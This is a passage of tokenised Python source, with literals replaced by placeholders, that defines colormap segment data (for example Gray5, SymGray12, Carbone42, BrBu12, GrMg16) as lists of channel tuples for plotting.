<NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Gray5_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Gray9_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _SymGray12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Carbone42_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _BrBu12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _GrMg16_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BrBu10_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _Bu10_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( 